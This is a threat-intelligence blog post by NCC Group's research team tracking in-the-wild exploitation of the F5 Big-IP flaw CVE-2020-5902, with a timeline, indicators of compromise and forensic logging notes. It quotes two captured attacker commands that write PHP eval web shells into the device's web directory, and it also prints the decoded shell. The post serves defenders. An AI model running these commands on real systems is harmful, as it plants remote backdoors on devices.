CVE-2020-5902 was disclosed on July 1st, 2020 by F5 Networks in K52145254 as a CVSS 10.0 remote code execution vulnerability in the Big-IP administrative interface. By July 3rd, 2020 NCC Group observed active exploitation. This blog is a summary of what we know as the situation develops.
About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IoCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.
The vulnerability was discovered by Positive Technologies and an associated blog post released on July 2nd, 2020. NCC Group’s RIFT established a live post on Reddit on July 3rd to collate early intelligence and raise awareness within the cyber defence and sysadmin communities.
In the F5 knowledge base article K52145254 there is the following mitigation:
<LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch>
This regex checks for:
..;
As such it can be described as a directory traversal vulnerability. This ability combined with functionality native to the device provides the ability to access files, upload files and execute code without authentication.
The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 5th, 2020.
The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 6th, 2020
Exploitation is varied including the access of password hashes:
As of Saturday remote code execution capabilities existed.
The first IPs we observed actively exploiting the issue were published at 17:00 UTC on July 4th, 2020 – https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2020-5902
In addition to these initial exploit attempts quickly there after details were shared in open source.
We have as of 10:00 on July 6th, 2020 started to see staged exploitation, namely a payload of:
The full payload is
We have as of 10:29 on July 6th, 2020 started to see a second staged exploitation, namely:
With a payload of
IoCs for the 2nd stage are
b8ce500c1e6ec4d4268ae0d2de82f9f35bbfc673 /tmp/demo.txt
We have as of 16:17 on July 6th, 2020 started to see a third staged exploitation, namely:
e1775079d58a6266fdd6185143642ac53b4314fe /var/log/F5-logcheck/zabbix
another IoC for this actor is
/tmp/cepi
Of note this actor did their original scans on July 6th, 2020 at 10:30 and the returned ~6 hours later.
As of 16:51 on July 6th, 2020 we’ve seen our first web shell
mount -o remount -rw /usr ; echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2NpdHJpeEBraGFycGVkYXInXSkpOz8+ | /usr/bin/openssl base64 -d -out /usr/local/www/xui/common/images/bg_status.php
when decoded appears to be a reused web shell from Citrix
<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>
As of 09:26 on July 7th, 2020 we’ve seen a second web shell
mount -o remount -rw /usr ;echo 'utility<?php @eval(base64_decode($_POST["session_sK4hodQm"]));' > /usr/local/www/xui/common/scripts/utility.php;mount -o remount -r /usr
As of 12:30 on July 7th, 2020 we’ve seen use of a new exploit
As the devices are load balancers they provide the opportunity to:
There are forensics artifacts available, although the log they are stored is limited to 20MB and thus risks cycling quickly.
The wider HTTP log configuration differs from a default configuration.
# # The location and format of the access logfile (Common Logfile Format). # If you do not define any access logfiles within a <VirtualHost> # container, they will be logged here. Contrariwise, if you *do* # define per-<VirtualHost> access logfiles, transactions will be # logged therein and *not* in this file. # #CustomLog "logs/access_log" common # # If you prefer a logfile with access, agent, and referer information # (Combined Logfile Format) you can use the following directive. # CustomLog "/var/run/httpd.pipe" acc_combined
The configuration causes it to send its output to a pipe. This pipe ultimately goes to systemd/journalctl
# grep httpd /etc/syslog-ng/syslog-ng_sysinit.conf.default source s_httpd { pipe("/var/run/httpd.pipe" optional(yes) perm(0660) group("apache")); destination d_httpd_err { file("/var/log/httpd/httpd_errors" create_dirs(yes)); source(s_httpd); destination(d_httpd_err);
Other forensic artifacts made include new .jsp files or similar used to achieve code execution.
A Sigma rule has been created and available here. However in order to utilize it will require for the logs of the Big-IP to be sent to a SIEM as passive network detection won’t work unless SSL/TLS can be decrypted.
Believe your organisation may have been compromised? Contact us on [email protected]
July 7th, 2020 @ 13:15 – v1.15 – added new exploit
July 7th, 2020 @ 09:26 – v1.14 – added the second web shell
July 6th, 2020 @ 17:09 – v1.13 – added the first web shell
July 6th, 2020 @ 16:40 – v1.12 – added another staged payload
July 6th, 2020 @ 13:13 – v1.11 – added detection aspects and session cookie theft
July 6th, 2020 @ 10:21 – v1.10 – added staged payload
July 6th, 2020 @ 09:48 – v1.9 – added Honeypot attack volumes from this morning
July 6th, 2020 @ 09:34 – v1.8 – added fact Metasploit exploitation seen in the wild
July 6th, 2020 @ 09:00 – v1.7 – added timeline of events
July 6th, 2020 @ 05:46 – v1.6 – added Metasploit modules and other public exploits released overnight
July 5th, 2020 @ 21:22 – v1.5 – added license key theft based on honeypot data
July 5th, 2020 @ 17:34 – v1.4 – included link to fully functional exploit being shared
July 5th, 2020 @ 16:28 – v1.3 – Further clarification on log pipe consumption
July 5th, 2020 @ 16:23 – v1.2 – New journalctl output example
July 5th, 2020 @ 16:16 – v1.1 – Clarified log pipe usage
July 5th, 2020 @ 15:40 – v1.0 – Initial version
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IoCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies. View all posts by RIFT: Research and Intelligence Fusion Team
Published